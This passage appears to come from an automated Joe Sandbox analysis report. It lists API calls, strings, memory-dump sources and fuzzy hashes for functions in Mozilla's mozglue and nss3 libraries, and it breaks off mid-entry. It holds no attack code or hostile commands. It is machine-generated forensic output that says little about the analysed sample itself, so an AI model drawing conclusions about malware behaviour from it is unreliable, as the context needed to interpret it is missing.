                                                                                                                                                                                          • Instruction Fuzzy Hash: D0E012B1A10208BFEF40DBA9DC45A9EBBF8EF44354F144065F909D3241E670EE00DB51
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C425492
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4254A8
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4254BE
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C4254DB
                                                                                                                                                                                            • Part of subcall function 6C44AB3F: EnterCriticalSection.KERNEL32(6C49E370,?,?,6C413527,6C49F6CC,?,?,?,?,?,?,?,?,6C413284), ref: 6C44AB49
                                                                                                                                                                                            • Part of subcall function 6C44AB3F: LeaveCriticalSection.KERNEL32(6C49E370,?,6C413527,6C49F6CC,?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44AB7C
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: GetCurrentProcess.KERNEL32(?,6C4131A7), ref: 6C44CBF1
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4131A7), ref: 6C44CBFA
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C4254F9
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C425516
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C42556A
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C425577
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000070), ref: 6C425585
                                                                                                                                                                                          • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C425590
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C4255E6
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C425606
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C425616
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C42563E
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C425646
                                                                                                                                                                                          • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C42567C
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4256AE
                                                                                                                                                                                            • Part of subcall function 6C435E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C435EDB
                                                                                                                                                                                            • Part of subcall function 6C435E90: memset.VCRUNTIME140(ewGl,000000E5,?), ref: 6C435F27
                                                                                                                                                                                            • Part of subcall function 6C435E90: LeaveCriticalSection.KERNEL32(?), ref: 6C435FB2
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C4256E8
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C425707
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C42570F
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C425729
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C42574E
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C42576B
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C425796
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C4257B3
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C4257CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP, xrefs: 6C4255E1
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C4257AE
                                                                                                                                                                                          • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C42548D
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C425717
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C425724
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C4257C5
                                                                                                                                                                                          • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C4254B9
                                                                                                                                                                                          • MOZ_BASE_PROFILER_HELP, xrefs: 6C425511
                                                                                                                                                                                          • GeckoMain, xrefs: 6C425554, 6C4255D5
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C425C56
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C425B38
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C425AC9
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C425749
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C425D2B
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C425CF9
                                                                                                                                                                                          • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C425BBE
                                                                                                                                                                                          • [I %d/%d] profiler_init, xrefs: 6C42564E
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C42584E
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C425791
                                                                                                                                                                                          • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C4254A3
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C4256E3
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C425766
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C425D1C
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C425D01
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C425D24
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                                          • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                                          • API String ID: 3686969729-1266492768
                                                                                                                                                                                          • Opcode ID: bde0d14a9c027e05947c493164de02456a2412a6936269c192958e243d1dc633
                                                                                                                                                                                          • Instruction ID: 3cc18482e24f105bd9a39c8c81d9002f90edacb6a1aa577f4e66bc5e2b99a25b
                                                                                                                                                                                          • Opcode Fuzzy Hash: bde0d14a9c027e05947c493164de02456a2412a6936269c192958e243d1dc633
                                                                                                                                                                                          • Instruction Fuzzy Hash: 792234B09043609FEB00EF74840AF6A7BB5AF5730DF444529E84A87B45EB39C855CB93
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C426CCC
                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C426D11
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(0000000C), ref: 6C426D26
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C426D35
                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C426D53
                                                                                                                                                                                          • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C426D73
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C426D80
                                                                                                                                                                                          • CertGetNameStringW.CRYPT32 ref: 6C426DC0
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000000), ref: 6C426DDC
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C426DEB
                                                                                                                                                                                          • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C426DFF
                                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C426E10
                                                                                                                                                                                          • CryptMsgClose.CRYPT32(00000000), ref: 6C426E27
                                                                                                                                                                                          • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C426E34
                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 6C426EF9
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000000), ref: 6C426F7D
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C426F8C
                                                                                                                                                                                          • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C42709D
                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C427103
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C427153
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C427176
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C427209
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42723A
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42726B
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42729C
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C4272DC
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42730D
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C4273C2
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4273F3
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4273FF
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C427406
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C42740D
                                                                                                                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C42741A
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(?), ref: 6C42755A
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C427568
                                                                                                                                                                                          • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C427585
                                                                                                                                                                                          • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C427598
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4275AC
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                           • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                          • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                          • API String ID: 3256780453-3980470659
                                                                                                                                                                                          • Opcode ID: 5dbdfda0d603af58ddfde679579b8c5e39e520480997f7b0d1b9c6e68d3f52d8
                                                                                                                                                                                          • Instruction ID: 970969d013f53d4c479da5302f00e4a3e7d972d2d2fa432e5c11c399a9c40926
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dbdfda0d603af58ddfde679579b8c5e39e520480997f7b0d1b9c6e68d3f52d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: E552E3B1A052249FEB21EF24CC85FAA77B8EF55708F104199E909A7740DB34AF85CF91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65A8EC,0000006C), ref: 6C556DC6
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65A958,0000006C), ref: 6C556DDB
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65A9C4,00000078), ref: 6C556DF1
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65AA3C,0000006C), ref: 6C556E06
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65AAA8,00000060), ref: 6C556E1C
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C556E38
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C556E76
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C55726F
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C557283
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • !, xrefs: 6C557123
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C55720A, 6C55738D, 6C5573A8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                           • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                          • String ID: !$.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.
                                                                                                                                                                                          • API String ID: 3333340300-4249839731
                                                                                                                                                                                          • Opcode ID: c782b07415e2240538cc1082fc0ee240d40d0dee73dbb5a64c8dbdbdf67d021a
                                                                                                                                                                                          • Instruction ID: 7ac9e5c91d561ccea32a6d97f21fd5ba10c96eb8900cc7a1ccfa34bd2c12e9b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c782b07415e2240538cc1082fc0ee240d40d0dee73dbb5a64c8dbdbdf67d021a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3729175D05215DFDF60DF28CC88B9ABBB5AF49304F5081AAD80DA7701EB31AA94CF91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473527
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47355B
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4735BC
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4735E0
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47363A
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473693
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4736CD
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473703
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47373C
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473775
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47378F
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473892
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4738BB
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473902
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473939
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473970
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4739EF
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473A26
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473AE5
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473E85
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473EBA
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473EE2
                                                                                                                                                                                            • Part of subcall function 6C476180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C4761DD
                                                                                                                                                                                            • Part of subcall function 6C476180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C47622C
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4740F9
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47412F
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C474157
                                                                                                                                                                                            • Part of subcall function 6C476180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C476250
                                                                                                                                                                                            • Part of subcall function 6C476180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C476292
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47441B
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C474448
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C47484E
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C474863
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C474878
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C474896
                                                                                                                                                                                          • free.MOZGLUE ref: 6C47489F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                           • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                           • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: floor$free$malloc$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3842999660-3916222277
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C4264DF
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C4264F2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C426505
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C426518
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C42652B
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C42671C
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C426724
                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C42672F
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C426759
                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C426764
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C426A80
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6C426ABE
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C426AD3
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C426AE8
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C426AF7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                          • API String ID: 487479824-2878602165
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C59ACC4
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C59ACD5
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C59ACF3
                                                                                                                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C59AD3B
                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C59ADC8
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59ADDF
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59ADF0
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59B06A
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59B08C
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C59B1BA
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C59B27C
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C59B2CA
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C59B3C1
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59B40C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1285963562-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C51ED38
                                                                                                                                                                                            • Part of subcall function 6C4B4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4B4FC4
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(snippet), ref: 6C51EF3C
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(offsets), ref: 6C51EFE4
                                                                                                                                                                                            • Part of subcall function 6C5DDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4B5001,?,00000003,00000000), ref: 6C5DDFD7
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C51F087
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C51F129
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(optimize), ref: 6C51F1D1
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C51F368
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
